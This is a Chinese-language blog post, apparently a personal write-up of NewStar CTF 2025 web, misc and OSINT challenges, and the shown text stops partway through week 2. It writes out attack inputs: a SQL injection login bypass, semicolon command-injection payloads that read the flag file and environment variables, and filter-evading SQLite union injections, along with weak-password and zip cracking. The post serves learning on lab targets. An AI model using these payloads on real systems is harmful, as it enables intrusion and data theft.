<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 8.1.1">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">
  <link rel="stylesheet" href="/lib/pace/pace-theme-minimal.min.css">
  <script src="/lib/pace/pace.min.js"></script>

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"example.com","root":"/","scheme":"Pisces","version":"7.8.0","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12,"onmobile":false},"copycode":{"enable":false,"show_result":false,"style":null},"back2top":{"enable":true,"sidebar":false,"scrollpercent":false},"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":false,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}}};
  </script>

  <meta name="description" content="前言最近搭建好了这个博客，这也是2026年写的的第一篇博客，决定复盘一下今年的newstar，复现平台https:&#x2F;&#x2F;ctf.xidian.edu.cn。题目难度由易到难从中也是学到了很多东西。这证书真的非常好，拆包裹跟当时拆大学录取通知书一样，而且还包邮。 week1webmulti-headach3题目提示  什么叫机器人控制了我的头？  访问robots.txt  直接在浏览器访问hidde">
<meta property="og:type" content="article">
<meta property="og:title" content="测试1">
<meta property="og:url" content="http://example.com/2026/01/22/%E6%B5%8B%E8%AF%951/index.html">
<meta property="og:site_name" content="程序元的blog">
<meta property="og:description" content="前言最近搭建好了这个博客，这也是2026年写的的第一篇博客，决定复盘一下今年的newstar，复现平台https:&#x2F;&#x2F;ctf.xidian.edu.cn。题目难度由易到难从中也是学到了很多东西。这证书真的非常好，拆包裹跟当时拆大学录取通知书一样，而且还包邮。 week1webmulti-headach3题目提示  什么叫机器人控制了我的头？  访问robots.txt  直接在浏览器访问hidde">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="d:\huchuhao\Typora\images\image-20260101203712361.png">
<meta property="og:image" content="d:\huchuhao\Typora\images\image-20260101204541884.png">
<meta property="og:image" content="d:\huchuhao\Typora\images\image-20260101205253024.png">
<meta property="og:image" content="d:\huchuhao\Typora\images\image-20260101210402472.png">
<meta property="og:image" content="d:\huchuhao\Typora\images\image-20260101210709287.png">
<meta property="og:image" content="d:\huchuhao\Typora\images\image-20260101211642234.png">
<meta property="og:image" content="d:\huchuhao\Typora\images\image-20260101220204561.png">
<meta property="og:image" content="d:\huchuhao\Typora\images\image-20260102154111927.png">
<meta property="og:image" content="d:\huchuhao\Typora\images\image-20260102155047925.png">
<meta property="og:image" content="d:\huchuhao\Typora\images\image-20260102155241498.png">
<meta property="og:image" content="d:\huchuhao\Typora\images\image-20260102155825399.png">
<meta property="og:image" content="d:\huchuhao\Typora\images\image-20260102160454371.png">
<meta property="og:image" content="d:\huchuhao\Typora\images\image-20260102160532315.png">
<meta property="og:image" content="d:\huchuhao\Typora\images\fence1_%E4%BF%AE%E6%94%B9%E9%AB%98%E5%BA%A6.jpg">
<meta property="og:image" content="d:\huchuhao\Typora\images\image-20260102162436890.png">
<meta property="og:image" content="d:\huchuhao\Typora\images\image-20260102163640036.png">
<meta property="og:image" content="d:\huchuhao\Typora\images\image-20260102164039066.png">
<meta property="og:image" content="d:\huchuhao\Typora\images\image-20260102165047196.png">
<meta property="og:image" content="d:\huchuhao\Typora\images\image-20260102165249442.png">
<meta property="og:image" content="d:\huchuhao\Typora\images\image-20260102165735618.png">
<meta property="og:image" content="d:\huchuhao\Typora\images\image-20260102165932973.png">
<meta property="og:image" content="d:\huchuhao\Typora\images\image-20260102170501856.png">
<meta property="og:image" content="d:\huchuhao\Typora\images\image-20260102170727399.png">
<meta property="og:image" content="d:\huchuhao\Typora\images\image-20260102171021705.png">
<meta property="og:image" content="d:\huchuhao\Typora\images\image-20260102171201763.png">
<meta property="og:image" content="d:\huchuhao\Typora\images\image-20260102171312045.png">
<meta property="og:image" content="d:\huchuhao\Typora\images\image-20260102172010834.png">
<meta property="og:image" content="d:\huchuhao\Typora\images\image-20260102172515839.png">
<meta property="og:image" content="d:\huchuhao\Typora\images\image-20260102172734934.png">
<meta property="og:image" content="d:\huchuhao\Typora\images\image-20260102183546090.png">
<meta property="og:image" content="d:\huchuhao\Typora\images\image-20260102183705614.png">
<meta property="og:image" content="d:\huchuhao\Typora\images\image-20260102184236038.png">
<meta property="og:image" content="d:\huchuhao\Typora\images\image-20260102184749780.png">
<meta property="og:image" content="d:\huchuhao\Typora\images\image-20260102190149171.png">
<meta property="og:image" content="d:\huchuhao\Typora\images\image-20260102191443192.png">
<meta property="og:image" content="d:\huchuhao\Typora\images\image-20260102191445541.png">
<meta property="og:image" content="d:\huchuhao\Typora\images\image-20260102192907231.png">
<meta property="og:image" content="d:\huchuhao\Typora\images\image-20260102193222829.png">
<meta property="og:image" content="d:\huchuhao\Typora\images\image-20260102195644722.png">
<meta property="og:image" content="d:\huchuhao\Typora\images\image-20260102204337030.png">
<meta property="og:image" content="d:\huchuhao\Typora\images\image-20260102211208122.png">
<meta property="og:image" content="d:\huchuhao\Typora\images\image-20260102211447439.png">
<meta property="og:image" content="d:\huchuhao\Typora\images\image-20260102212101719.png">
<meta property="og:image" content="d:\huchuhao\Typora\images\image-20260102212111433.png">
<meta property="og:image" content="d:\huchuhao\Typora\images\image-20260102212258466.png">
<meta property="og:image" content="d:\huchuhao\Typora\images\image-20260102214929391.png">
<meta property="og:image" content="d:\huchuhao\Typora\images\image-20260102215824614.png">
<meta property="og:image" content="d:\huchuhao\Typora\images\image-20260102220122705.png">
<meta property="og:image" content="d:\huchuhao\Typora\images\image-20260102220630697.png">
<meta property="og:image" content="d:\huchuhao\Typora\images\image-20260102221542393.png">
<meta property="article:published_time" content="2026-01-21T16:02:07.000Z">
<meta property="article:modified_time" content="2026-01-22T08:53:15.203Z">
<meta property="article:author" content="程序元">
<meta property="article:tag" content="ctf">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="d:\huchuhao\Typora\images\image-20260101203712361.png">

<link rel="canonical" href="http://example.com/2026/01/22/%E6%B5%8B%E8%AF%951/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'zh-CN'
  };
</script>

  <title>测试1 | 程序元的blog</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <h1 class="site-title">程序元的blog</h1>
      <span class="logo-line-after"><i></i></span>
    </a>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
    </div>
  </div>
</div>




<nav class="site-nav">
  <ul id="menu" class="main-menu menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="fa fa-home fa-fw"></i>首页</a>

  </li>
        <li class="menu-item menu-item-about">

    <a href="/about/" rel="section"><i class="fa fa-user fa-fw"></i>关于</a>

  </li>
        <li class="menu-item menu-item-tags">

    <a href="/tags/" rel="section"><i class="fa fa-tags fa-fw"></i>标签</a>

  </li>
        <li class="menu-item menu-item-categories">

    <a href="/categories/" rel="section"><i class="fa fa-th fa-fw"></i>分类</a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>归档</a>

  </li>
  </ul>
</nav>




</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content post posts-expand">
            

    
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="http://example.com/2026/01/22/%E6%B5%8B%E8%AF%951/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/avatar.gif">
      <meta itemprop="name" content="程序元">
      <meta itemprop="description" content="路漫漫其修远兮，吾将上下而求索。">
    </span>
    
    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="程序元的blog">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          测试1
        </h1>
    
        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-calendar"></i>
              </span>
              <span class="post-meta-item-text">发表于</span>
              
    
              <time title="创建时间：2026-01-22 00:02:07 / 修改时间：16:53:15" itemprop="dateCreated datePublished" datetime="2026-01-22T00:02:07+08:00">2026-01-22</time>
            </span>
    
          <br>
            <span class="post-meta-item" title="本文字数">
              <span class="post-meta-item-icon">
                <i class="far fa-file-word"></i>
              </span>
                <span class="post-meta-item-text">本文字数：</span>
             <span></span>
            </span>
            <span class="post-meta-item" title="阅读时长">
              <span class="post-meta-item-icon">
                <i class="far fa-clock"></i>
              </span>
                <span class="post-meta-item-text">阅读时长 &asymp;</span>
              <span>undefined 分钟</span>
            </span>
    
        </div>
      </header>
    
    
    
    
    <div class="post-body" itemprop="articleBody">
    
      
        <h1 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h1><p>最近搭建好了这个博客，这也是2026年写的的第一篇博客，决定复盘一下今年的newstar，复现平台<a target="_blank" rel="noopener" href="https://ctf.xidian.edu.cn.题目难度由易到难从中也是学到了很多东西.这证书真的非常好,拆包裹跟当时拆大学录取通知书一样,而且还包邮./">https://ctf.xidian.edu.cn。题目难度由易到难从中也是学到了很多东西。这证书真的非常好，拆包裹跟当时拆大学录取通知书一样，而且还包邮。</a></p>
<h1 id="week1"><a href="#week1" class="headerlink" title="week1"></a>week1</h1><h2 id="web"><a href="#web" class="headerlink" title="web"></a>web</h2><h3 id="multi-headach3"><a href="#multi-headach3" class="headerlink" title="multi-headach3"></a><strong>multi-headach3</strong></h3><p>题目提示</p>
<blockquote>
<p>什么叫机器人控制了我的头？</p>
</blockquote>
<p>访问robots.txt</p>
<p><img src="D:\huchuhao\Typora\images\image-20260101203712361.png" alt="image-20260101203712361"></p>
<p>直接在浏览器访问hidden.php会自动跳转到index.php，抓包就行了</p>
<p><img src="D:\huchuhao\Typora\images\image-20260101204541884.png" alt="image-20260101204541884"></p>
<h3 id="strange-login"><a href="#strange-login" class="headerlink" title="strange_login"></a><strong>strange_login</strong></h3><p>万能密码一把梭</p>
<p>1’ or true#</p>
<p><img src="D:\huchuhao\Typora\images\image-20260101205253024.png" alt="image-20260101205253024"></p>
<h3 id="别笑，你也过不了第二关"><a href="#别笑，你也过不了第二关" class="headerlink" title="别笑，你也过不了第二关"></a><strong>别笑，你也过不了第二关</strong></h3><p>进去发现数一个小游戏，分析前端代码，当通关所有关卡（当前代码只有 2 关）后，会向 <code>/flag.php</code> POST 提交 <code>score</code> 参数然后回显flag，写一个代码在控制台执行了一下就行了</p>
<p><img src="D:\huchuhao\Typora\images\image-20260101210402472.png" alt="image-20260101210402472"></p>
<p>代码如下</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">// 强制设置分数为第二关目标值</span><br><span class="line">score = 1000000;</span><br><span class="line">// 切换到第二关（最终关）</span><br><span class="line">currentLevel = 1;</span><br><span class="line">// 关闭游戏定时器防止干扰</span><br><span class="line">if (gateInterval) clearInterval(gateInterval);</span><br><span class="line">// 手动触发关卡结束逻辑，直接请求flag.php</span><br><span class="line">endLevel();</span><br></pre></td></tr></table></figure>

<h3 id="宇宙的中心是-PHP"><a href="#宇宙的中心是-PHP" class="headerlink" title="宇宙的中心是 PHP"></a><strong>宇宙的中心是 PHP</strong></h3><p>进去是一个动态页面，尝试后发现不能够ctrl+U看网页代码，我这里用的是IE，ctrl+shift+I，打开开发者工具</p>
<p><img src="D:\huchuhao\Typora\images\image-20260101210709287.png" alt="image-20260101210709287"></p>
<p>访问s3kret.php</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">highlight_file(__FILE__);</span><br><span class="line">include &quot;flag.php&quot;;</span><br><span class="line">if(isset($_POST[&#x27;newstar2025&#x27;]))&#123;</span><br><span class="line">    $answer = $_POST[&#x27;newstar2025&#x27;];</span><br><span class="line">    if(intval($answer)!=47&amp;&amp;intval($answer,0)==47)&#123;</span><br><span class="line">        echo $flag;</span><br><span class="line">    &#125;else&#123;</span><br><span class="line">        echo &quot;你还未参透奥秘&quot;;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>首先是post传参，然后参数的值要满足两个条件，</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">intval($answer)!=47&amp;&amp;intval($answer,0)==47</span><br></pre></td></tr></table></figure>

<p>intval是php用于将变量转换为 <strong>整数</strong> 的函数，第二个参数是控制进制转换，题目中用0，就是自动根据字符串前缀来推测进制</p>
<p>构造payload</p>
<p>newstar2025&#x3D;0x2f          (47的十六进制)</p>
<p>十进制解析 ≠ 47，自动进制解析 &#x3D; 47</p>
<p><img src="D:\huchuhao\Typora\images\image-20260101211642234.png" alt="image-20260101211642234"></p>
<h3 id="我真得控制你了"><a href="#我真得控制你了" class="headerlink" title="我真得控制你了"></a><strong>我真得控制你了</strong></h3><p>这个还是老方法打开开发者工具看到前端代码，这个按钮是disable属性的，我们要带点击这个按钮，ai写一个代码就行了，一步到位</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line">// 核心：移除禁用 + 显示按钮 + 移除遮罩</span><br><span class="line">const btn = document.getElementById(&#x27;accessButton&#x27;);</span><br><span class="line">// 1. 移除disabled属性（解除禁用）</span><br><span class="line">btn.disabled = false;</span><br><span class="line">btn.removeAttribute(&#x27;disabled&#x27;);</span><br><span class="line">// 2. 确保按钮可见（防止样式隐藏）</span><br><span class="line">btn.style.pointerEvents = &#x27;auto&#x27;;</span><br><span class="line">btn.style.opacity = &#x27;1&#x27;;</span><br><span class="line">btn.style.cursor = &#x27;pointer&#x27;;</span><br><span class="line">// 3. 移除遮罩层（如果有）</span><br><span class="line">const shield = document.getElementById(&#x27;shieldOverlay&#x27;);</span><br><span class="line">if (shield) &#123;</span><br><span class="line">  shield.remove(); // 直接删除遮罩</span><br><span class="line">  // 或隐藏遮罩（推荐，避免布局乱）：shield.style.display = &#x27;none&#x27;;</span><br><span class="line">&#125;</span><br><span class="line">// 4. 主动触发一次点击（可选，解锁后直接点）</span><br><span class="line">btn.click();</span><br></pre></td></tr></table></figure>

<p>然后就是弱口令爆破</p>
<p><img src="D:\huchuhao\Typora\images\image-20260101220204561.png" alt="image-20260101220204561"></p>
<p>admin&#x2F;111111，登入得到代码</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">error_reporting(0);</span><br><span class="line"></span><br><span class="line">function generate_dynamic_flag($secret) &#123;</span><br><span class="line">    return getenv(&quot;ICQ_FLAG&quot;) ?: &#x27;default_flag&#x27;;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">if (isset($_GET[&#x27;newstar&#x27;])) &#123;</span><br><span class="line">    $input = $_GET[&#x27;newstar&#x27;];</span><br><span class="line">    </span><br><span class="line">    if (is_array($input)) &#123;</span><br><span class="line">        die(&quot;恭喜掌握新姿势&quot;);</span><br><span class="line">    &#125;</span><br><span class="line">    </span><br><span class="line"></span><br><span class="line">    if (preg_match(&#x27;/[^\d*\/~()\s]/&#x27;, $input)) &#123;</span><br><span class="line">        die(&quot;老套路了，行不行啊&quot;);</span><br><span class="line">    &#125;</span><br><span class="line">    </span><br><span class="line"></span><br><span class="line">    if (preg_match(&#x27;/^[\d\s]+$/&#x27;, $input)) &#123;</span><br><span class="line">        die(&quot;请输入有效的表达式&quot;);</span><br><span class="line">    &#125;</span><br><span class="line">    </span><br><span class="line">    $test = 0;</span><br><span class="line">    try &#123;</span><br><span class="line">        @eval(&quot;\$test = $input;&quot;);</span><br><span class="line">    &#125; catch (Error $e) &#123;</span><br><span class="line">        die(&quot;表达式错误&quot;);</span><br><span class="line">    &#125;</span><br><span class="line">    </span><br><span class="line">    if ($test == 2025) &#123;</span><br><span class="line">        $flag = generate_dynamic_flag($flag_secret);</span><br><span class="line">        echo &quot;&lt;div class=&#x27;success&#x27;&gt;拿下flag！&lt;/div&gt;&quot;;</span><br><span class="line">        echo &quot;&lt;div class=&#x27;flag-container&#x27;&gt;&lt;div class=&#x27;flag&#x27;&gt;FLAG: &#123;$flag&#125;&lt;/div&gt;&lt;/div&gt;&quot;;</span><br><span class="line">    &#125; else &#123;</span><br><span class="line">        echo &quot;&lt;div class=&#x27;error&#x27;&gt;大哥哥泥把数字算错了: $test ≠ 2025&lt;/div&gt;&quot;;</span><br><span class="line">    &#125;</span><br><span class="line">&#125; else &#123;</span><br><span class="line">    ?&gt;</span><br><span class="line">&lt;?php &#125; ?&gt;</span><br></pre></td></tr></table></figure>

<p>接收 GET 参数<code>newstar</code>，需满足：</p>
<p>非数组类型；</p>
<p>仅包含 <code>数字、*、/、~、()、空格</code> 这些字符；</p>
<p>不能只有数字和空格（必须是表达式）；</p>
<p>通过<code>eval</code>执行表达式后结果等于 2025，即可输出 flag</p>
<p>那就同取反</p>
<p>?newstar&#x3D;<del>(</del>2025)</p>
<p>取反两次还是2025</p>
<h3 id="黑客小-W-的故事（1）"><a href="#黑客小-W-的故事（1）" class="headerlink" title="黑客小 W 的故事（1）"></a><strong>黑客小 W 的故事（1）</strong></h3><p>首先第一关就是要打怪获得积分，但是过程中会被古神单杀，提示抓包，抓包看一下，看到传入{<strong>“count”</strong>:<strong>1</strong>}，直接改为800放包</p>
<p><img src="D:\huchuhao\Typora\images\image-20260102154111927.png" alt="image-20260102154111927"></p>
<p>进入下一关，通过get传参?shipin&#x3D;mogubaozi就可以看到蘑菇先生具体说了什么，然后post传参，参数名为guding，得到要用DELETE删掉chognzi，修改数据包</p>
<p><img src="D:\huchuhao\Typora\images\image-20260102155047925.png" alt="image-20260102155047925"></p>
<p>我们需要guding，</p>
<p><img src="D:\huchuhao\Typora\images\image-20260102155241498.png" alt="image-20260102155241498"></p>
<p>进入下一关，根据提示要在ua中修改，使用CycloneSlash</p>
<p><img src="D:\huchuhao\Typora\images\image-20260102155825399.png" alt="image-20260102155825399"></p>
<p>然后还有冲锋斩</p>
<p><img src="D:\huchuhao\Typora\images\image-20260102160454371.png" alt="image-20260102160454371"></p>
<p>最后一关的入口&#x2F;Level4_Sly </p>
<p><img src="D:\huchuhao\Typora\images\image-20260102160532315.png" alt="image-20260102160532315"></p>
<h2 id="misc"><a href="#misc" class="headerlink" title="misc"></a>misc</h2><h3 id="Sign-in"><a href="#Sign-in" class="headerlink" title="Sign in"></a><strong>Sign in</strong></h3><p>签到题</p>
<p>flag{Welcome_to_NewStar_CTF_2025!}</p>
<h3 id="EZ-fence"><a href="#EZ-fence" class="headerlink" title="EZ_fence"></a><strong>EZ_fence</strong></h3><p>题目提示</p>
<blockquote>
<p>RAR 发现一张残缺的照片竟然需 要 4 颗钉子才能钉住，照片里面似乎藏着秘密。</p>
</blockquote>
<p>提取信息：fence就是栅栏，rar，残却图片，4</p>
<p>附件信息是rdh9zfwzSgoVA7GWtLPQJK&#x3D;vwuZvjhvPyyvjnMWoSotB</p>
<p>随波逐流分析发现有隐藏的rar文件，提取出来得到一个加密的文件，残缺的图片，考虑宽高隐写，然后得到隐藏信息</p>
<p><img src="D:\huchuhao\Typora\images\fence1_修改高度.jpg" alt="fence1_修改高度"></p>
<p>8426513709qazwsxedcrfvtgbyhnujmikoplQWSAERFDYHGUIKJOPLMNBVCXZ-_</p>
<p>这一共是64个字符，可以作为一个base64自定义码表，那上面rdh9zfwzSgoVA7GWtLPQJK&#x3D;vwuZvjhvPyyvjnMWoSotB栅栏4解密</p>
<p><img src="D:\huchuhao\Typora\images\image-20260102162436890.png" alt="image-20260102162436890"></p>
<p>rSvMwgdouWZVhAvoj79GhSvWztPoyLfPytvQwJjBnKz&#x3D;</p>
<p>符合base64特征，可以看到解码时乱码，因为用的是默认的码表，这里替换为题目给的码表</p>
<p><img src="D:\huchuhao\Typora\images\image-20260102163640036.png" alt="image-20260102163640036"></p>
<p>解压文件得到flag</p>
<p>flag{y0u_kn0w_ez_fence_tuzh0ng}</p>
<h3 id="Misc-城邦：压缩术"><a href="#Misc-城邦：压缩术" class="headerlink" title="Misc 城邦：压缩术"></a><strong>Misc 城邦：压缩术</strong></h3><p>首先根据题目提示密码长度是6位，小写字母和数字，开始爆破密码</p>
<p><img src="D:\huchuhao\Typora\images\image-20260102164039066.png" alt="image-20260102164039066"></p>
<p>ns2025</p>
<p>解压后看提示，没有密码还有输入密码，就是伪加密，随波逐流修复一下，然后得到一个压缩包，一个文件，压缩包有一个加密的key.txt,这就是明文攻击了，爆破密码d00rkey</p>
<p><img src="D:\huchuhao\Typora\images\image-20260102165047196.png" alt="image-20260102165047196"></p>
<p>解压得到flag</p>
<p>flag{You_have_mastered_the_zip_magic!}</p>
<h3 id="OSINT：天空-belong"><a href="#OSINT：天空-belong" class="headerlink" title="OSINT：天空 belong"></a><strong>OSINT：天空 belong</strong></h3><p>flag格式</p>
<p><code>flag{航班号_照片拍摄时所在省份的省会城市_拍摄设备的制造商}</code>，制造商为英文（首字母大写）</p>
<p>首先看附件信息，查看属性</p>
<p><img src="D:\huchuhao\Typora\images\image-20260102165249442.png" alt="image-20260102165249442"></p>
<p>可以看到制造商是Xiaomi，拍摄日期是2025年8月17日15:03,分析图片机翼，有飞机的注册号B-7198，查询当天航班</p>
<img src="D:\huchuhao\Typora\images\image-20260102165735618.png" alt="image-20260102165735618" style="zoom: 33%;" />

<p>拍摄时间是15:03，符合要求的航班只有乌鲁木齐航空UQ3574，</p>
<img src="D:\huchuhao\Typora\images\image-20260102165932973.png" alt="image-20260102165932973" style="zoom:33%;" />

<p>拍摄日期距离航班结束非常接近，那么就是武汉，最后flag</p>
<p>flag{UQ3574_武汉市_Xiaomi}</p>
<h3 id="前有文字，所以搜索很有用"><a href="#前有文字，所以搜索很有用" class="headerlink" title="前有文字，所以搜索很有用"></a><strong>前有文字，所以搜索很有用</strong></h3><p>题目分为3关，先看第一关，文件描述的是零宽字符，就是零宽隐写，使用pazzlesolver</p>
<p><img src="D:\huchuhao\Typora\images\image-20260102170501856.png" alt="image-20260102170501856"></p>
<p> ZmxhZ3t5b3Vf，base64解码flag{you_</p>
<p>然后第二关</p>
<p>看到附件名字考察的就是snow隐写，然后密钥，密钥考察的是brainfuck隐写</p>
<p><img src="D:\huchuhao\Typora\images\image-20260102170727399.png" alt="image-20260102170727399"></p>
<p>密钥是brainfuckisgooooood</p>
<p>然后题目还有提示</p>
<blockquote>
<p>Track2 的隐藏数据并没有被压缩，请不要使用 <code>-C</code>.</p>
</blockquote>
<p><img src="D:\huchuhao\Typora\images\image-20260102171021705.png" alt="image-20260102171021705"></p>
<p>—– …- …– .-. -.-. ….- – . ..–.-一眼摩斯密码</p>
<p><img src="D:\huchuhao\Typora\images\image-20260102171201763.png" alt="image-20260102171201763"></p>
<p>0V3RC4ME_</p>
<p>最后一关字频分析</p>
<p><img src="D:\huchuhao\Typora\images\image-20260102171312045.png" alt="image-20260102171312045"></p>
<p>cH@1LenG3s}</p>
<p>最后的flag</p>
<p>flag{you_0V3RC4ME_cH@1LenG3s}</p>
<h3 id="我不要革命失败"><a href="#我不要革命失败" class="headerlink" title="我不要革命失败"></a><strong>我不要革命失败</strong></h3><p>这里用windbg分析，执行命令!analyze -v，!process把信息直接让ai分析就行了</p>
<p><img src="D:\huchuhao\Typora\images\image-20260102172010834.png" alt="image-20260102172010834"></p>
<p>flag{CRITICAL_PROCESS_DIED_svchost.exe}</p>
<h1 id="week2"><a href="#week2" class="headerlink" title="week2"></a>week2</h1><h2 id="web-1"><a href="#web-1" class="headerlink" title="web"></a>web</h2><h3 id="DD-加速器"><a href="#DD-加速器" class="headerlink" title="DD 加速器"></a><strong>DD 加速器</strong></h3><p>一个经典的rce，使用分号进行命令注入</p>
<p>127.0.0.1;cat &#x2F;f*</p>
<p><img src="D:\huchuhao\Typora\images\image-20260102172515839.png" alt="image-20260102172515839"></p>
<p>查看环境变量</p>
<p>127.0.0.1;env</p>
<p><img src="D:\huchuhao\Typora\images\image-20260102172734934.png" alt="image-20260102172734934"></p>
<h3 id="小-E-的管理系统"><a href="#小-E-的管理系统" class="headerlink" title="小 E 的管理系统"></a><strong>小 E 的管理系统</strong></h3><p>这个当时比赛是没写出来，对sqlite了解的太少了.一看这个输入框就是sql注入，首先判断是字符型还是数字型，尝试id&#x3D;1’发现有waf，id&#x3D;1+1，发现回显2，证明是数字型</p>
<p><img src="D:\huchuhao\Typora\images\image-20260102183546090.png" alt="image-20260102183546090"></p>
<p>抓包看信息</p>
<p><img src="D:\huchuhao\Typora\images\image-20260102183705614.png" alt="image-20260102183705614"></p>
<p>发现返回有5列，刚才尝试的时候知道题目是存在waf的，fuzz测试一下看看过滤了那些字符</p>
<p><img src="D:\huchuhao\Typora\images\image-20260102184236038.png" alt="image-20260102184236038"></p>
<p>过滤了空格，引号，加号，逗号等等。</p>
<p>判断列数，用%0a或者%09替换空格</p>
<p><img src="D:\huchuhao\Typora\images\image-20260102184749780.png" alt="image-20260102184749780"></p>
<p>判断查讯列数为5，然后看数据库</p>
<p><img src="D:\huchuhao\Typora\images\image-20260102190149171.png" alt="image-20260102190149171"></p>
<p>对于sqlite来说是没有库这个概念的，直接对象就是表，所以这个不是mysql，是sqlite。看回显位，用join绕过逗号，用cyberchef可以快速替换空格，比较方便</p>
<p>-1 union select * from (select 1)a join (select 2)b join (select 3)c join (select 4)d join (select 5)e</p>
<p><img src="D:\huchuhao\Typora\images\image-20260102191443192.png" alt="image-20260102191443192"></p>
<p><img src="D:\huchuhao\Typora\images\image-20260102191445541.png" alt="image-20260102191445541"></p>
<p>都是回显位那就开始查表</p>
<p>?id&#x3D;-1%0aunion%0aselect%0a*%0afrom%0a(select%0a1)a%0ajoin%0a(select%0a2)b%0ajoin%0a(select%0a3)c%0ajoin%0a(select%0a4)d%0ajoin%0a(select%0asql%0afrom%0asqlite_master)e</p>
